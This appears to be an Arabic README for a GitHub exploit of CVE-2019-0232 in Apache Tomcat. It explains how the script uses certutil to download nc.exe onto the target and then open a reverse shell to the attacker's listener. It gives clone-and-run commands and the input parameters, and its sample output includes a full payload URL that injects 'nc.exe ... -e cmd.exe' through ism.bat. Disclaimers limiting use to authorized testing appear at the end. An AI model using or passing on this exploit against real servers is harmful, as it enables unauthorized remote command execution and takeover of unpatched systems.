
مرحبًا، هذا كود منقّح ومحسّن لـ CVE-2019-0232
يستغل هذا السكريبت ثغرة CVE-2019-0232 في Apache Tomcat، والتي تسمح بتنفيذ الأوامر عن بُعد من خلال المعالجة غير السليمة لسكريبت ism.bat. يستخدم السكريبت تقنية القشرة العكسية (reverse shell) باستخدام certutil و nc.exe (Netcat) للوصول عن بُعد إلى النظام المستهدف.
ism.bat قد تسمح للمهاجمين بتنفيذ أوامر اعتباطية على الخادم. تحدث هذه الثغرة بسبب عدم التحقق السليم من مدخلات المستخدم، مما يسمح للمهاجمين بتشغيل أوامر اعتباطية من خلال طلب مصمم خصيصًا.nc.exe خبيث من خادم بعيد واستخدامه لفتح قشرة عكسية.nc.exe) على خادم لتلقي اتصال القشرة العكسية.nc.exe: يرسل السكريبت طلبًا مصممًا إلى خادم Tomcat الضعيف لتنزيل ملف nc.exe (Netcat) إلى الجهاز الهدف باستخدام certutil.nc.exe، يتم إرسال طلب آخر لتنفيذ أمر القشرة العكسية، والذي يعيد الاتصال بمستمع Netcat الخاص بالمهاجم.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
بعد التنفيذ بنجاح، يجب أن تحصل على اتصال قشرة عكسية يعود إلى مستمع Netcat الخاص بك.
هذا السكريبت مخصص للأغراض التعليمية فقط. لا تستخدمه في أنشطة خبيثة. احرص دائمًا على الحصول على إذن مناسب قبل محاولة أي اختبار اختراق أو تدقيق أمني. قد يؤدي إساءة استخدام هذا السكريبت إلى عواقب قانونية.
تأكد من أن خادم Apache Tomcat غير محدث ضد CVE-2019-0232 قبل استخدام هذا الاستغلال. قد يتطلب السكريبت صلاحيات إدارية اعتمادًا على تكوين النظام الهدف.
المؤلف: A!Z3N(Dharan) صُنع بقوة!
هذا المشروع مرخص بموجب رخصة MIT.
ومع ذلك، استخدمه على مسؤوليتك الخاصة. هذا الكود مقدم لأغراض تعليمية فقط. باستخدامك لهذا الكود، فأنت توافق على تحمل المسؤولية الكاملة عن أي ناتج عن استخدامه. قد يؤدي إساءة الاستخدام أو الاستخدام غير المصرح به لهذا الاستغلال إلى عواقب قانونية. احصل دائمًا على إذن مناسب قبل إجراء أي اختبار أمان أو اختبار اختراق على أي نظام.
أنت حر في استخدام هذا الكود وتعديله وتوزيعه، ولكن لأغراض أخلاقية فقط. المؤلف غير مسؤول عن أي ضرر ناتج عن هذا الكود.
لا تستخدم هذا الاستغلال دون إذن صريح من مالك النظام الهدف.